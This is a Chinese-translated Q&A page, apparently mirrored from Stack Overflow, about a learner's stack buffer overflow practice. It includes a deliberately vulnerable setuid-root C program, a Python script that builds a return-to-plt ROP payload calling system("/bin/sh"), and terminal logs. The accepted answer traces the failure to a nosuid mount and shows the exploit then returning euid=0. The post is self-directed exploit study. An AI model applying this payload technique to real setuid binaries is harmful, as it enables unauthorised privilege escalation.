堆栈内存溢出
  繁体   English   中英

为什么我的缓冲区溢出只会打开一个用户shell而不是root shell?

[英]why will my buffer overflow exploit open a user shell only instead of a root shell?

 原文  2017-10-16 20:57:02       python/ c/ x86-64/ buffer-overflow/ exploit

问题描述

我一直在关注缓冲区溢出漏洞的一些教程。 但我的问题是,我无法打开root shell,我总是会得到一个普通的用户shell。 我检查了以下几点

我重新验证了以下项目,但仍然无法实现实际的root shell:

  • 我正确地将二进制文件的所有者设置为root并设置了s标志(check)
  • 我已经验证我使用的漏洞利用工作正常,使用系统@ plt和exit @ plt的正确地址,并通过pop rdi; ret将值正确加载到rdi中; 段; 我确实得到了一个shell但不是预期的root shell; (校验)
  • 我听说现在dash和bash会删除权限,将/ bin / sh链接到/ bin / zsh会有所帮助,但这对我没有帮助; 仍然得到非root shell(检查,方法对我不起作用)
  • 我还试图调用setuid(0)和seteuid(0)来测试二进制文件。 仍然没有根壳; (检查,对我不起作用)
  • 我也看到有些人把/ proc / sys / kernel / yama / ptrace_scope设置为0(见这里的帖子) 看到这里的帖子 ,但对我来说情况并非如此(值设置为1,我从未触及过)(检查,我的值设置为1,那应该没问题)
  • 我正在使用linux mint 18.1 serena,也许这里有一个额外的安全功能,可以删除权限并防止root-shell?
  • 看看我的c代码并利用下面的python脚本作为参考(漏洞在函数vuln()); 函数shell()只是让相应的@plt函数的地址可用(这只是为了锻炼和玩耍)
  • 我使用'gcc -fno-stack-protector -o ghost ghost.c'来编译二进制文件以避免堆栈金丝雀

有人知道问题可能是什么吗? 为什么我仍然不会得到root shell?

提前感谢任何建议和提示。 最好的Zaphoxx

易受攻击的C代码: 

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void shell(){
    system("/bin/sh");
    exit(0);
}
int vuln(){
    char buf[4];
    ssize_t l=0;
    printf("[+] input: ");
    l=read(0,buf,128);
    printf("[+] recv: ");
    write(1,buf,l);
    return 0;
}

int main(){
    //setbuf(stdout,0);
    setuid(0);
    seteuid(0);
    vuln();
    return 0;
}

python漏洞利用脚本来创建有效负载: 

#!/usr/bin/python
from struct import *
from subprocess import call

poprdi=0x4007e3#pop rdi;ret;
system_plt=0x400560#address of system@plt
exit_plt=0x4005a0#address of exit@plt
shell=0x400804#address of '/bin/sh'
buf=b''
buf+=bytearray("A","utf-8")*24
buf+=pack("<Q",poprdi)
buf+=pack("<Q",shell)
buf+=pack("<Q",system_plt)
buf+=pack("<Q",poprdi)
buf+=pack("<Q",0)
buf+=pack("<Q",exit_plt)

with open("pwn","w") as p:
    p.write(buf)

来自ls -l的截图

编辑更新:

所以我重新按照建议重新调用execve()直接调用一个小二进制文件,而不是使用易受攻击的二进制文件,只是为了检查是否会打开root shell: 

zaphoxx@zaphoxx ~/github/ghostInTheShell $ vim shellcode.c
zaphoxx@zaphoxx ~/github/ghostInTheShell $ gcc -fno-stack-protector -o shell shellcode.c
zaphoxx@zaphoxx ~/github/ghostInTheShell $ sudo chown root:root shell ; sudo chmod 4755 shell
zaphoxx@zaphoxx ~/github/ghostInTheShell $ ll shell
-rwsr-xr-x 1 root root 8608 Oct 17 21:29 shell*
zaphoxx@zaphoxx ~/github/ghostInTheShell $ ./shell
$ id                                                                           
uid=1000(zaphoxx) gid=1000(zaphoxx) groups=1000(zaphoxx),4(adm),24(cdrom),27(sudo),30(dip),33(www-data),46(plugdev),113(lpadmin),130(sambashare)
$ whoami                                                                       
zaphoxx
$ exit                                                                         
zaphoxx@zaphoxx ~/github/ghostInTheShell $ cat shellcode.c
#include <stdio.h>
#include <unistd.h>

int main(){
    char *name[2];
    name[0]="/bin/sh";
    name[1]=NULL;
    execve(name[0],name,NULL);
}
zaphoxx@zaphoxx ~/github/ghostInTheShell $

所以它不会打开root shell;

我按照其他帖子的建议将/ bin / sh链接到/ bin / zsh,请看这里: 

zaphoxx@zaphoxx ~/github/ghostInTheShell $ ll $(which sh)
lrwxrwxrwx 1 root root 12 Oct 15 22:09 /bin/sh -> /usr/bin/zsh*
zaphoxx@zaphoxx ~/github/ghostInTheShell $

正如Peter所建议的,我使用'/ usr / bin / id'作为我的漏洞利用中的系统参数来检查,但结果与预期相同: 

zaphoxx@zaphoxx ~/github/ghostInTheShell $ ./ghost < pwn
uid=1000(zaphoxx) gid=1000(zaphoxx) groups=1000(zaphoxx),4(adm),24(cdrom),27(sudo),30(dip),33(www-data),46(plugdev),113(lpadmin),130(sambashare)
[+] recv: AAAAAAAAHzaphoxx@zaphoxx ~/github/ghostInTheShell $ ll ./ghost
-rwsr-xr-x 1 root root 8816 Oct 17 22:25 ./ghost*
zaphoxx@zaphoxx ~/github/ghostInTheShell $ 

zaphoxx@zaphoxx ~/github/ghostInTheShell $ cat ghost.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void shell(){
    system("/usr/bin/id");
    exit(0);
}
int vuln(){
    char buf[4];
    ssize_t l=0;
    l=read(0,buf,128);
    printf("[+] recv: %s",buf);
    //write(1,buf,l);
    return 0;
}

int main(){
    //shell();
    //setbuf(stdout,0);
    //setuid(0);
    //seteuid(0);
    vuln();
    return 0;
}
zaphoxx@zaphoxx ~/github/ghostInTheShell $

更新:我从KABuhr得到了一个很好的提示,检查/ proc / mounts是否有nosuid条目,并且: 

zaphoxx@zaphoxx ~ $ cat /proc/mounts | grep zaphoxx
/home/zaphoxx/.Private /home/zaphoxx ecryptfs rw,nosuid,nodev,relatime

所以这似乎是我的问题的原因。 我如何改变正确的方式或如何暂时停用nosuid以便我可以测试漏洞利用?

1 个解决方案

解决方案1
 2 已采纳  2017-10-18 10:29:43

感谢大家提供的帮助。 特别感谢Kabuhr提供了正确的提示。

在/ proc / mounts中,有多个具有nosuid标志的文件夹/文件系统条目。 这阻止了漏洞利用打开root shell,因为我试图利用的二进制文件是在带有nosuid标志的文件夹中。

我将二进制文件移动到/ usr / local / src / ghostInTheShell并创建了一个从原始文件夹到新文件夹的符号链接(没有nosuid标志)。

在那里运行漏洞一切都按预期工作。 谢谢大家。 见下面的结果: 

zaphoxx@zaphoxx /usr/local/src/ghostInTheShell $ gcc -fno-stack-protector -o ghost ghost.c ; sudo chown root:root ghost ; sudo chmod 4755 ghost; ll ./ghost;
-rwsr-xr-x 1 root root 8816 Oct 18 12:22 ./ghost*
zaphoxx@zaphoxx /usr/local/src/ghostInTheShell $ ( cat pwn ; cat ) | ./ghost
ls
exp.py   ghost.py   in.txt  peda-session-dash.txt     sexecve.log
fish     ghost.py~  leak    peda-session-ghost.txt    shell
fish.c   gits       leak.c  peda-session-lib2plt.txt  shellcode.c
fish.c~  gits.c     lib2plt pwn
ghost    gits.o     lib2plt.c   pwn.py
ghost.c  in.text    libtest.so  r2lib-addresses
whoami
**root**
id
uid=1000(zaphoxx) gid=1000(zaphoxx) **euid=0(root)** groups=1000(zaphoxx),4(adm),24(cdrom),27(sudo),30(dip),33(www-data),46(plugdev),113(lpadmin),130(sambashare)
exit
[+] recv: AAAAAAAAH

暂无
暂无

声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.

相关问题 缓冲区溢出漏洞利用 TCP 不会保持外壳打开 为什么我的堆栈缓冲区溢出漏洞无效? 为什么我用我的64位漏洞利用程序在_Global_Offset_Table错误中得到了SIGSEGV,而不是获得了shell 不是root用户通过python执行iptables shell 为什么 Shell 将 python 脚本的标准输出重定向到我的 shell 变量中? json.tool shell 返回 1,我丢失了 vim 缓冲区 subprocess.Popen 试图打开模块而不是在 shell 上执行它 为什么Crond找不到我的Shell脚本? 为什么cd在我的反向shell上不起作用? 为什么该程序不能在Shell中运行,而可以在我的IDE中运行?
相关标签
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM